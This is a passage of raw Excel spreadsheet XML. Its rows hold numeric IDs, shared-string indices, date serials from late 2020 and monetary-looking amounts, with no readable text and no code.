        <v>10689</v>
      </c>
      <c r="E2490">
        <v>13</v>
      </c>
      <c r="F2490" t="s">
        <v>9546</v>
      </c>
      <c r="G2490" s="1">
        <v>44074</v>
      </c>
      <c r="H2490">
        <v>50000</v>
      </c>
      <c r="J2490" t="s">
        <v>9456</v>
      </c>
    </row>
    <row r="2491" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2491">
        <v>22228</v>
      </c>
      <c r="B2491">
        <v>4934</v>
      </c>
      <c r="C2491" t="s">
        <v>7586</v>
      </c>
      <c r="D2491" t="s">
        <v>11893</v>
      </c>
      <c r="E2491">
        <v>3</v>
      </c>
      <c r="F2491" t="s">
        <v>3341</v>
      </c>
      <c r="G2491" s="1">
        <v>44084</v>
      </c>
      <c r="H2491">
        <v>400</v>
      </c>
      <c r="I2491" t="s">
        <v>11894</v>
      </c>
    </row>
    <row r="2492" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2492">
        <v>22229</v>
      </c>
      <c r="B2492">
        <v>4783</v>
      </c>
      <c r="C2492" t="s">
        <v>7611</v>
      </c>
      <c r="D2492" t="s">
        <v>11895</v>
      </c>
      <c r="E2492">
        <v>9</v>
      </c>
      <c r="F2492" t="s">
        <v>7613</v>
      </c>
      <c r="G2492" s="1">
        <v>44120</v>
      </c>
      <c r="H2492">
        <v>500</v>
      </c>
      <c r="J2492" t="s">
        <v>9456</v>
      </c>
    </row>
    <row r="2493" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2493">
        <v>22230</v>
      </c>
      <c r="B2493">
        <v>4934</v>
      </c>
      <c r="C2493" t="s">
        <v>7586</v>
      </c>
      <c r="D2493" t="s">
        <v>11893</v>
      </c>
      <c r="E2493">
        <v>3</v>
      </c>
      <c r="F2493" t="s">
        <v>10898</v>
      </c>
      <c r="G2493" s="1">
        <v>44084</v>
      </c>
      <c r="H2493">
        <v>500</v>
      </c>
      <c r="I2493" t="s">
        <v>11894</v>
      </c>
    </row>
    <row r="2494" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2494">
        <v>22231</v>
      </c>
      <c r="B2494">
        <v>4871</v>
      </c>
      <c r="C2494" t="s">
        <v>5612</v>
      </c>
      <c r="D2494" t="s">
        <v>11896</v>
      </c>
      <c r="E2494">
        <v>26</v>
      </c>
      <c r="F2494" t="s">
        <v>364</v>
      </c>
      <c r="G2494" s="1">
        <v>44182</v>
      </c>
      <c r="H2494">
        <v>2000000</v>
      </c>
      <c r="I2494" t="s">
        <v>10238</v>
      </c>
      <c r="J2494" t="s">
        <v>11897</v>
      </c>
    </row>
    <row r="2495" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2495">
        <v>22232</v>
      </c>
      <c r="B2495">
        <v>4871</v>
      </c>
      <c r="C2495" t="s">
        <v>5612</v>
      </c>
      <c r="D2495" t="s">
        <v>11896</v>
      </c>
      <c r="E2495">
        <v>26</v>
      </c>
      <c r="F2495" t="s">
        <v>10392</v>
      </c>
      <c r="G2495" s="1">
        <v>44182</v>
      </c>
      <c r="H2495">
        <v>500000</v>
      </c>
      <c r="I2495" t="s">
        <v>10238</v>
      </c>
      <c r="J2495" t="s">
        <v>11897</v>
      </c>
    </row>
    <row r="2496" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2496">
        <v>22233</v>
      </c>
      <c r="B2496">
        <v>4871</v>
      </c>
      <c r="C2496" t="s">
        <v>5612</v>
      </c>
      <c r="D2496" t="s">
        <v>11896</v>
      </c>
      <c r="E2496">
        <v>26</v>
      </c>
      <c r="F2496" t="s">
        <v>3204</v>
      </c>
      <c r="G2496" s="1">
        <v>44182</v>
      </c>
      <c r="H2496">
        <v>100000</v>
      </c>
      <c r="I2496" t="s">
        <v>10238</v>
      </c>
      <c r="J2496" t="s">
        <v>11897</v>
      </c>
    </row>
    <row r="2497" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2497">
        <v>22234</v>
      </c>
      <c r="B2497">
        <v>292</v>
      </c>
      <c r="C2497" t="s">
        <v>1714</v>
      </c>
      <c r="D2497" t="s">
        <v>11898</v>
      </c>
      <c r="E2497">
        <v>12</v>
      </c>
      <c r="F2497" t="s">
        <v>11899</v>
      </c>
      <c r="G2497" s="1">
        <v>44117</v>
      </c>
      <c r="H2497">
        <v>800000</v>
      </c>
      <c r="I2497" t="s">
        <v>11900</v>
      </c>
    </row>
    <row r="2498" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2498">
        <v>22235</v>
      </c>
      <c r="B2498">
        <v>292</v>
      </c>
      <c r="C2498" t="s">
        <v>1714</v>
      </c>
      <c r="D2498" t="s">
        <v>11898</v>
      </c>
      <c r="E2498">
        <v>12</v>
      </c>
      <c r="F2498" t="s">
        <v>9437</v>
      </c>
      <c r="G2498" s="1">
        <v>44117</v>
      </c>
      <c r="H2498">
        <v>200000</v>
      </c>
      <c r="I2498" t="s">
        <v>10031</v>
      </c>
    </row>
    <row r="2499" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2499">
        <v>22236</v>
      </c>
      <c r="B2499">
        <v>292</v>
      </c>
      <c r="C2499" t="s">
        <v>1714</v>
      </c>
      <c r="D2499" t="s">
        <v>11898</v>
      </c>
      <c r="E2499">
        <v>12</v>
      </c>
      <c r="F2499" t="s">
        <v>11901</v>
      </c>
      <c r="G2499" s="1">
        <v>44117</v>
      </c>
      <c r="H2499">
        <v>200000</v>
      </c>
      <c r="I2499" t="s">
        <v>10031</v>
      </c>
    </row>
    <row r="2500" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2500">
        <v>22237</v>
      </c>
      <c r="B2500">
        <v>292</v>
      </c>
      <c r="C2500" t="s">
        <v>1714</v>
      </c>
      <c r="D2500" t="s">
        <v>11898</v>
      </c>
      <c r="E2500">
        <v>12</v>
      </c>
      <c r="F2500" t="s">
        <v>609</v>
      </c>
      <c r="G2500" s="1">
        <v>44117</v>
      </c>
      <c r="H2500">
        <v>200000</v>
      </c>
      <c r="I2500" t="s">
        <v>10031</v>
      </c>
    </row>
    <row r="2501" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2501">
        <v>22238</v>
      </c>
      <c r="B2501">
        <v>292</v>
      </c>
      <c r="C2501" t="s">
        <v>1714</v>
      </c>
      <c r="D2501" t="s">
        <v>11898</v>
      </c>
      <c r="E2501">
        <v>12</v>
      </c>
      <c r="F2501" t="s">
        <v>2236</v>
      </c>
      <c r="G2501" s="1">
        <v>44117</v>
      </c>
      <c r="H2501">
        <v>100000</v>
      </c>
      <c r="I2501" t="s">
        <v>10031</v>
      </c>
    </row>
    <row r="2502" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2502">
        <v>22239</v>
      </c>
      <c r="B2502">
        <v>1123</v>
      </c>
      <c r="C2502" t="s">
        <v>3438</v>
      </c>
      <c r="D2502" t="s">
        <v>11902</v>
      </c>
      <c r="E2502">
        <v>11</v>
      </c>
      <c r="F2502" t="s">
        <v>11903</v>
      </c>
      <c r="G2502" s="1">
        <v>44145</v>
      </c>
      <c r="H2502">
        <v>0</v>
      </c>
      <c r="I2502" t="s">
        <v>11904</v>
      </c>
    </row>
    <row r="2503" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2503">
        <v>22240</v>
      </c>
      <c r="B2503">
        <v>1123</v>
      </c>
      <c r="C2503" t="s">
        <v>3438</v>
      </c>
      <c r="D2503" t="s">
        <v>11902</v>
      </c>
      <c r="E2503">
        <v>11</v>
      </c>
      <c r="F2503" t="s">
        <v>11905</v>
      </c>
      <c r="G2503" s="1">
        <v>44145</v>
      </c>
      <c r="H2503">
        <v>20000</v>
      </c>
      <c r="I2503" t="s">
        <v>9952</v>
      </c>
    </row>
    <row r="2504" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2504">
        <v>22242</v>
      </c>
      <c r="B2504">
        <v>1240</v>
      </c>
      <c r="C2504" t="s">
        <v>2554</v>
      </c>
      <c r="D2504" t="s">
        <v>9781</v>
      </c>
      <c r="E2504">
        <v>1</v>
      </c>
      <c r="F2504" t="s">
        <v>11906</v>
      </c>
      <c r="G2504" s="1">
        <v>44139</v>
      </c>
      <c r="H2504">
        <v>1000</v>
      </c>
      <c r="I2504" t="s">
        <v>11907</v>
      </c>
      <c r="J2504" t="s">
        <v>9478</v>
      </c>
    </row>
    <row r="2505" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2505">
        <v>22243</v>
      </c>
      <c r="B2505">
        <v>913</v>
      </c>
      <c r="C2505" t="s">
        <v>3460</v>
      </c>
      <c r="D2505" t="s">
        <v>11908</v>
      </c>
      <c r="E2505">
        <v>13</v>
      </c>
      <c r="F2505" t="s">
        <v>3462</v>
      </c>
      <c r="G2505" s="1">
        <v>44137</v>
      </c>
      <c r="H2505">
        <v>1200000</v>
      </c>
      <c r="I2505" t="s">
        <v>11909</v>
      </c>
      <c r="J2505" t="s">
        <v>11910</v>
      </c>
    </row>
    <row r="2506" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2506">
        <v>22244</v>
      </c>
      <c r="B2506">
        <v>2213</v>
      </c>
      <c r="C2506" t="s">
        <v>6254</v>
      </c>
      <c r="D2506" t="s">
        <v>11911</v>
      </c>
      <c r="E2506">
        <v>16</v>
      </c>
      <c r="F2506" t="s">
        <v>9441</v>
      </c>
      <c r="G2506" s="1">
        <v>44146</v>
      </c>
      <c r="H2506">
        <v>672000</v>
      </c>
      <c r="J2506" t="s">
        <v>9538</v>
      </c>
    </row>
    <row r="2507" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2507">
        <v>22245</v>
      </c>
      <c r="B2507">
        <v>2213</v>
      </c>
      <c r="C2507" t="s">
        <v>6254</v>
      </c>
      <c r="D2507" t="s">
        <v>11911</v>
      </c>
      <c r="E2507">
        <v>16</v>
      </c>
      <c r="F2507" t="s">
        <v>673</v>
      </c>
      <c r="G2507" s="1">
        <v>44146</v>
      </c>
      <c r="H2507">
        <v>210000</v>
      </c>
    </row>
    <row r="2508" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2508">
        <v>22246</v>
      </c>
      <c r="B2508">
        <v>2213</v>
      </c>
      <c r="C2508" t="s">
        <v>6254</v>
      </c>
      <c r="D2508" t="s">
        <v>11911</v>
      </c>
      <c r="E2508">
        <v>16</v>
      </c>
      <c r="F2508" t="s">
        <v>10007</v>
      </c>
      <c r="G2508" s="1">
        <v>44146</v>
      </c>
      <c r="H2508">
        <v>75000</v>
      </c>
      <c r="J2508" t="s">
        <v>9538</v>
      </c>
    </row>
    <row r="2509" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2509">
        <v>22247</v>
      </c>
      <c r="B2509">
        <v>236</v>
      </c>
      <c r="C2509" t="s">
        <v>1890</v>
      </c>
      <c r="D2509" t="s">
        <v>11158</v>
      </c>
      <c r="E2509">
        <v>16</v>
      </c>
      <c r="F2509" t="s">
        <v>9437</v>
      </c>
      <c r="G2509" s="1">
        <v>44106</v>
      </c>
      <c r="H2509">
        <v>1000</v>
      </c>
      <c r="J2509" t="s">
        <v>11912</v>
      </c>
    </row>
    <row r="2510" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2510">
        <v>22248</v>
      </c>
      <c r="B2510">
        <v>236</v>
      </c>
      <c r="C2510" t="s">
        <v>1890</v>
      </c>
      <c r="D2510" t="s">
        <v>11158</v>
      </c>
      <c r="E2510">
        <v>16</v>
      </c>
      <c r="F2510" t="s">
        <v>11913</v>
      </c>
      <c r="G2510" s="1">
        <v>44106</v>
      </c>
      <c r="H2510">
        <v>1000</v>
      </c>
      <c r="J2510" t="s">
        <v>11912</v>
      </c>
    </row>
    <row r="2511" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2511">
        <v>22249</v>
      </c>
      <c r="B2511">
        <v>236</v>
      </c>
      <c r="C2511" t="s">
        <v>1890</v>
      </c>
      <c r="D2511" t="s">
        <v>11158</v>
      </c>
      <c r="E2511">
        <v>16</v>
      </c>
      <c r="F2511" t="s">
        <v>9435</v>
      </c>
      <c r="G2511" s="1">
        <v>44106</v>
      </c>
      <c r="H2511">
        <v>1000</v>
      </c>
      <c r="J2511" t="s">
        <v>11914</v>
      </c>
    </row>
    <row r="2512" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2512">
        <v>22250</v>
      </c>
      <c r="B2512">
        <v>236</v>
      </c>
      <c r="C2512" t="s">
        <v>1890</v>
      </c>
      <c r="D2512" t="s">
        <v>11158</v>
      </c>
      <c r="E2512">
        <v>16</v>
      </c>
      <c r="F2512" t="s">
        <v>9433</v>
      </c>
      <c r="G2512" s="1">
        <v>44097</v>
      </c>
      <c r="H2512">
        <v>0</v>
      </c>
      <c r="J2512" t="s">
        <v>11914</v>
      </c>
    </row>
    <row r="2513" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2513">
        <v>22251</v>
      </c>
      <c r="B2513">
        <v>236</v>
      </c>
      <c r="C2513" t="s">
        <v>1890</v>
      </c>
      <c r="D2513" t="s">
        <v>11158</v>
      </c>
      <c r="E2513">
        <v>16</v>
      </c>
      <c r="F2513" t="s">
        <v>11159</v>
      </c>
      <c r="G2513" s="1">
        <v>44106</v>
      </c>
      <c r="H2513">
        <v>1000</v>
      </c>
      <c r="J2513" t="s">
        <v>11915</v>
      </c>
    </row>
    <row r="2514" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2514">
        <v>22252</v>
      </c>
      <c r="B2514">
        <v>895</v>
      </c>
      <c r="C2514" t="s">
        <v>3150</v>
      </c>
      <c r="D2514" t="s">
        <v>11916</v>
      </c>
      <c r="E2514">
        <v>16</v>
      </c>
      <c r="F2514" t="s">
        <v>4950</v>
      </c>
      <c r="G2514" s="1">
        <v>44106</v>
      </c>
      <c r="H2514">
        <v>12000</v>
      </c>
      <c r="J2514" t="s">
        <v>11917</v>
      </c>
    </row>
    <row r="2515" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2515">
        <v>22253</v>
      </c>
      <c r="B2515">
        <v>901</v>
      </c>
      <c r="C2515" t="s">
        <v>3467</v>
      </c>
      <c r="D2515" t="s">
        <v>11918</v>
      </c>
      <c r="E2515">
        <v>16</v>
      </c>
      <c r="F2515" t="s">
        <v>3673</v>
      </c>
      <c r="G2515" s="1">
        <v>44155</v>
      </c>
      <c r="H2515">
        <v>384000</v>
      </c>
      <c r="J2515" t="s">
        <v>9752</v>
      </c>
    </row>
    <row r="2516" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2516">
        <v>22254</v>
      </c>
      <c r="B2516">
        <v>901</v>
      </c>
      <c r="C2516" t="s">
        <v>3467</v>
      </c>
      <c r="D2516" t="s">
        <v>11918</v>
      </c>
      <c r="E2516">
        <v>16</v>
      </c>
      <c r="F2516" t="s">
        <v>6569</v>
      </c>
      <c r="G2516" s="1">
        <v>44155</v>
      </c>
      <c r="H2516">
        <v>0</v>
      </c>
    </row>
    <row r="2517" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2517">
        <v>22255</v>
      </c>
      <c r="B2517">
        <v>901</v>
      </c>
      <c r="C2517" t="s">
        <v>3467</v>
      </c>
      <c r="D2517" t="s">
        <v>11918</v>
      </c>
      <c r="E2517">
        <v>16</v>
      </c>
      <c r="F2517" t="s">
        <v>11919</v>
      </c>
      <c r="G2517" s="1">
        <v>44155</v>
      </c>
      <c r="H2517">
        <v>0</v>
      </c>
    </row>
    <row r="2518" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2518">
        <v>22256</v>
      </c>
      <c r="B2518">
        <v>4834</v>
      </c>
      <c r="C2518" t="s">
        <v>7329</v>
      </c>
      <c r="D2518" t="s">
        <v>11555</v>
      </c>
      <c r="E2518">
        <v>12</v>
      </c>
      <c r="F2518" t="s">
        <v>2236</v>
      </c>
      <c r="G2518" s="1">
        <v>44081</v>
      </c>
      <c r="H2518">
        <v>100000</v>
      </c>
      <c r="I2518" t="s">
        <v>11920</v>
      </c>
    </row>
    <row r="2519" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2519">
        <v>22257</v>
      </c>
      <c r="B2519">
        <v>1134</v>
      </c>
      <c r="C2519" t="s">
        <v>3448</v>
      </c>
      <c r="D2519" t="s">
        <v>11921</v>
      </c>
      <c r="E2519">
        <v>2</v>
      </c>
      <c r="F2519" t="s">
        <v>9437</v>
      </c>
      <c r="G2519" s="1">
        <v>44106</v>
      </c>
      <c r="H2519">
        <v>2000000</v>
      </c>
      <c r="I2519" t="s">
        <v>9603</v>
      </c>
      <c r="J2519" t="s">
        <v>9509</v>
      </c>
    </row>
    <row r="2520" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2520">
        <v>22264</v>
      </c>
      <c r="B2520">
        <v>1134</v>
      </c>
      <c r="C2520" t="s">
        <v>3448</v>
      </c>
      <c r="D2520" t="s">
        <v>11921</v>
      </c>
      <c r="E2520">
        <v>2</v>
      </c>
      <c r="F2520" t="s">
        <v>7057</v>
      </c>
      <c r="G2520" s="1">
        <v>44106</v>
      </c>
      <c r="H2520">
        <v>200000</v>
      </c>
      <c r="I2520" t="s">
        <v>9603</v>
      </c>
      <c r="J2520" t="s">
        <v>10860</v>
      </c>
    </row>
    <row r="2521" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2521">
        <v>22266</v>
      </c>
      <c r="B2521">
        <v>4784</v>
      </c>
      <c r="C2521" t="s">
        <v>7562</v>
      </c>
      <c r="D2521" t="s">
        <v>11922</v>
      </c>
      <c r="E2521">
        <v>5</v>
      </c>
      <c r="F2521" t="s">
        <v>7564</v>
      </c>
      <c r="G2521" s="1">
        <v>44127</v>
      </c>
      <c r="H2521">
        <v>1200</v>
      </c>
      <c r="J2521" t="s">
        <v>9456</v>
      </c>
    </row>
    <row r="2522" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2522">
        <v>22267</v>
      </c>
      <c r="B2522">
        <v>2763</v>
      </c>
      <c r="C2522" t="s">
        <v>7619</v>
      </c>
      <c r="D2522" t="s">
        <v>11923</v>
      </c>
      <c r="E2522">
        <v>14</v>
      </c>
      <c r="F2522" t="s">
        <v>11924</v>
      </c>
      <c r="G2522" s="1">
        <v>44124</v>
      </c>
      <c r="H2522">
        <v>300000</v>
      </c>
      <c r="I2522" t="s">
        <v>11925</v>
      </c>
      <c r="J2522" t="s">
        <v>10280</v>
      </c>
    </row>
    <row r="2523" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2523">
        <v>22268</v>
      </c>
      <c r="B2523">
        <v>2763</v>
      </c>
      <c r="C2523" t="s">
        <v>7619</v>
      </c>
      <c r="D2523" t="s">
        <v>11923</v>
      </c>
      <c r="E2523">
        <v>14</v>
      </c>
      <c r="F2523" t="s">
        <v>11926</v>
      </c>
      <c r="G2523" s="1">
        <v>44124</v>
      </c>
      <c r="H2523">
        <v>200000</v>
      </c>
      <c r="I2523" t="s">
        <v>11925</v>
      </c>
      <c r="J2523" t="s">
        <v>10280</v>
      </c>
    </row>
    <row r="2524" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2524">
        <v>22269</v>
      </c>
      <c r="B2524">
        <v>2763</v>
      </c>
      <c r="C2524" t="s">
        <v>7619</v>
      </c>
      <c r="D2524" t="s">
        <v>11923</v>
      </c>
      <c r="E2524">
        <v>14</v>
      </c>
      <c r="F2524" t="s">
        <v>11027</v>
      </c>
      <c r="G2524" s="1">
        <v>44124</v>
      </c>
      <c r="H2524">
        <v>250000</v>
      </c>
      <c r="I2524" t="s">
        <v>9836</v>
      </c>
      <c r="J2524" t="s">
        <v>10280</v>
      </c>
    </row>
    <row r="2525" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2525">
        <v>22270</v>
      </c>
      <c r="B2525">
        <v>2763</v>
      </c>
      <c r="C2525" t="s">
        <v>7619</v>
      </c>
      <c r="D2525" t="s">
        <v>11923</v>
      </c>
      <c r="E2525">
        <v>14</v>
      </c>
      <c r="F2525" t="s">
        <v>9435</v>
      </c>
      <c r="G2525" s="1">
        <v>44124</v>
      </c>
      <c r="H2525">
        <v>250000</v>
      </c>
      <c r="I2525" t="s">
        <v>9836</v>
      </c>
      <c r="J2525" t="s">
        <v>9994</v>
      </c>
    </row>
    <row r="2526" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2526">
        <v>22271</v>
      </c>
      <c r="B2526">
        <v>2704</v>
      </c>
      <c r="C2526" t="s">
        <v>5703</v>
      </c>
      <c r="D2526" t="s">
        <v>11927</v>
      </c>
      <c r="E2526">
        <v>14</v>
      </c>
      <c r="F2526" t="s">
        <v>11928</v>
      </c>
      <c r="G2526" s="1">
        <v>44137</v>
      </c>
      <c r="H2526">
        <v>300000</v>
      </c>
      <c r="J2526" t="s">
        <v>11929</v>
      </c>
    </row>
    <row r="2527" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2527">
        <v>22272</v>
      </c>
      <c r="B2527">
        <v>2704</v>
      </c>
      <c r="C2527" t="s">
        <v>5703</v>
      </c>
      <c r="D2527" t="s">
        <v>11927</v>
      </c>
      <c r="E2527">
        <v>14</v>
      </c>
      <c r="F2527" t="s">
        <v>11930</v>
      </c>
      <c r="G2527" s="1">
        <v>44137</v>
      </c>
      <c r="H2527">
        <v>300000</v>
      </c>
      <c r="J2527" t="s">
        <v>11931</v>
      </c>
    </row>
    <row r="2528" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2528">
        <v>22273</v>
      </c>
      <c r="B2528">
        <v>2704</v>
      </c>
      <c r="C2528" t="s">
        <v>5703</v>
      </c>
      <c r="D2528" t="s">
        <v>11927</v>
      </c>
      <c r="E2528">
        <v>14</v>
      </c>
      <c r="F2528" t="s">
        <v>4686</v>
      </c>
      <c r="G2528" s="1">
        <v>44137</v>
      </c>
      <c r="H2528">
        <v>300000</v>
      </c>
      <c r="J2528" t="s">
        <v>11931</v>
      </c>
    </row>
    <row r="2529" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2529">
        <v>22274</v>
      </c>
      <c r="B2529">
        <v>2704</v>
      </c>
      <c r="C2529" t="s">
        <v>5703</v>
      </c>
      <c r="D2529" t="s">
        <v>11927</v>
      </c>
      <c r="E2529">
        <v>14</v>
      </c>
      <c r="F2529" t="s">
        <v>6917</v>
      </c>
      <c r="G2529" s="1">
        <v>44137</v>
      </c>
      <c r="H2529">
        <v>300000</v>
      </c>
      <c r="J2529" t="s">
        <v>11931</v>
      </c>
    </row>
    <row r="2530" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2530">
        <v>22275</v>
      </c>
      <c r="B2530">
        <v>2704</v>
      </c>
      <c r="C2530" t="s">
        <v>5703</v>
      </c>
      <c r="D2530" t="s">
        <v>11927</v>
      </c>
      <c r="E2530">
        <v>14</v>
      </c>
      <c r="F2530" t="s">
        <v>9527</v>
      </c>
      <c r="G2530" s="1">
        <v>44137</v>
      </c>
      <c r="H2530">
        <v>300000</v>
      </c>
      <c r="J2530" t="s">
        <v>11932</v>
      </c>
    </row>
    <row r="2531" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2531">
        <v>22276</v>
      </c>
      <c r="B2531">
        <v>2704</v>
      </c>
      <c r="C2531" t="s">
        <v>5703</v>
      </c>
      <c r="D2531" t="s">
        <v>11927</v>
      </c>
      <c r="E2531">
        <v>14</v>
      </c>
      <c r="F2531" t="s">
        <v>3814</v>
      </c>
      <c r="G2531" s="1">
        <v>44137</v>
      </c>
      <c r="H2531">
        <v>300000</v>
      </c>
      <c r="J2531" t="s">
        <v>11933</v>
      </c>
    </row>
    <row r="2532" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2532">
        <v>22277</v>
      </c>
      <c r="B2532">
        <v>2704</v>
      </c>
      <c r="C2532" t="s">
        <v>5703</v>
      </c>
      <c r="D2532" t="s">
        <v>11927</v>
      </c>
      <c r="E2532">
        <v>14</v>
      </c>
      <c r="F2532" t="s">
        <v>2236</v>
      </c>
      <c r="G2532" s="1">
        <v>44137</v>
      </c>
      <c r="H2532">
        <v>300000</v>
      </c>
      <c r="J2532" t="s">
        <v>11934</v>
      </c>
    </row>
    <row r="2533" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2533">
        <v>22278</v>
      </c>
      <c r="B2533">
        <v>2704</v>
      </c>
      <c r="C2533" t="s">
        <v>5703</v>
      </c>
      <c r="D2533" t="s">
        <v>11927</v>
      </c>
      <c r="E2533">
        <v>14</v>
      </c>
      <c r="F2533" t="s">
        <v>9435</v>
      </c>
      <c r="G2533" s="1">
        <v>44137</v>
      </c>
      <c r="H2533">
        <v>300000</v>
      </c>
      <c r="J2533" t="s">
        <v>11935</v>
      </c>
    </row>
    <row r="2534" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2534">
        <v>22284</v>
      </c>
      <c r="B2534">
        <v>4963</v>
      </c>
      <c r="C2534" t="s">
        <v>7629</v>
      </c>
      <c r="D2534" t="s">
        <v>11936</v>
      </c>
      <c r="E2534">
        <v>29</v>
      </c>
      <c r="F2534" t="s">
        <v>4686</v>
      </c>
      <c r="G2534" s="1">
        <v>44113</v>
      </c>
      <c r="H2534">
        <v>1000</v>
      </c>
      <c r="I2534" t="s">
        <v>11870</v>
      </c>
      <c r="J2534" t="s">
        <v>11937</v>
      </c>
    </row>
    <row r="2535" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2535">
        <v>22285</v>
      </c>
      <c r="B2535">
        <v>4963</v>
      </c>
      <c r="C2535" t="s">
        <v>7629</v>
      </c>
      <c r="D2535" t="s">
        <v>11936</v>
      </c>
      <c r="E2535">
        <v>29</v>
      </c>
      <c r="F2535" t="s">
        <v>2236</v>
      </c>
      <c r="G2535" s="1">
        <v>44113</v>
      </c>
      <c r="H2535">
        <v>500</v>
      </c>
      <c r="I2535" t="s">
        <v>9536</v>
      </c>
      <c r="J2535" t="s">
        <v>9810</v>
      </c>
    </row>
    <row r="2536" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2536">
        <v>22286</v>
      </c>
      <c r="B2536">
        <v>1277</v>
      </c>
      <c r="C2536" t="s">
        <v>16434</v>
      </c>
      <c r="D2536" t="s">
        <v>16435</v>
      </c>
      <c r="E2536">
        <v>2</v>
      </c>
      <c r="F2536" t="s">
        <v>10667</v>
      </c>
      <c r="G2536" s="1">
        <v>44097</v>
      </c>
      <c r="H2536" s="4">
        <v>1000</v>
      </c>
      <c r="I2536" t="s">
        <v>11938</v>
      </c>
      <c r="J2536" t="s">
        <v>11939</v>
      </c>
    </row>
    <row r="2537" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2537">
        <v>22287</v>
      </c>
      <c r="B2537">
        <v>2253</v>
      </c>
      <c r="C2537" t="s">
        <v>2612</v>
      </c>
      <c r="D2537" t="s">
        <v>9422</v>
      </c>
      <c r="E2537">
        <v>16</v>
      </c>
      <c r="F2537" t="s">
        <v>11940</v>
      </c>
      <c r="G2537" s="1">
        <v>44183</v>
      </c>
      <c r="H2537">
        <v>10000</v>
      </c>
      <c r="J2537" t="s">
        <v>9538</v>
      </c>
    </row>
    <row r="2538" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2538">
        <v>22288</v>
      </c>
      <c r="B2538">
        <v>2253</v>
      </c>
      <c r="C2538" t="s">
        <v>2612</v>
      </c>
      <c r="D2538" t="s">
        <v>9422</v>
      </c>
      <c r="E2538">
        <v>16</v>
      </c>
      <c r="F2538" t="s">
        <v>11941</v>
      </c>
      <c r="G2538" s="1">
        <v>44183</v>
      </c>
      <c r="H2538">
        <v>7000</v>
      </c>
      <c r="J2538" t="s">
        <v>9538</v>
      </c>
    </row>
    <row r="2539" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2539">
        <v>22289</v>
      </c>
      <c r="B2539">
        <v>2253</v>
      </c>
      <c r="C2539" t="s">
        <v>2612</v>
      </c>
      <c r="D2539" t="s">
        <v>9422</v>
      </c>
      <c r="E2539">
        <v>16</v>
      </c>
      <c r="F2539" t="s">
        <v>11942</v>
      </c>
      <c r="G2539" s="1">
        <v>44183</v>
      </c>
      <c r="H2539">
        <v>2000</v>
      </c>
      <c r="J2539" t="s">
        <v>9538</v>
      </c>
    </row>
    <row r="2540" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2540">
        <v>22290</v>
      </c>
      <c r="B2540">
        <v>2253</v>
      </c>
      <c r="C2540" t="s">
        <v>2612</v>
      </c>
      <c r="D2540" t="s">
        <v>9422</v>
      </c>
      <c r="E2540">
        <v>16</v>
      </c>
      <c r="F2540" t="s">
        <v>11943</v>
      </c>
      <c r="G2540" s="1">
        <v>44183</v>
      </c>
      <c r="H2540">
        <v>2000</v>
      </c>
      <c r="J2540" t="s">
        <v>9538</v>
      </c>
    </row>
    <row r="2541" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2541">
        <v>22292</v>
      </c>
      <c r="B2541">
        <v>2253</v>
      </c>
      <c r="C2541" t="s">
        <v>2612</v>
      </c>
      <c r="D2541" t="s">
        <v>9422</v>
      </c>
      <c r="E2541">
        <v>16</v>
      </c>
      <c r="F2541" t="s">
        <v>11944</v>
      </c>
      <c r="G2541" s="1">
        <v>44183</v>
      </c>
      <c r="H2541">
        <v>3000</v>
      </c>
      <c r="J2541" t="s">
        <v>9538</v>
      </c>
    </row>
    <row r="2542" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2542">
        <v>22293</v>
      </c>
      <c r="B2542">
        <v>2253</v>
      </c>
      <c r="C2542" t="s">
        <v>2612</v>
      </c>
      <c r="D2542" t="s">
        <v>9422</v>
      </c>
      <c r="E2542">
        <v>16</v>
      </c>
      <c r="F2542" t="s">
        <v>11945</v>
      </c>
      <c r="G2542" s="1">
        <v>44183</v>
      </c>
      <c r="H2542">
        <v>4000</v>
      </c>
      <c r="J2542" t="s">
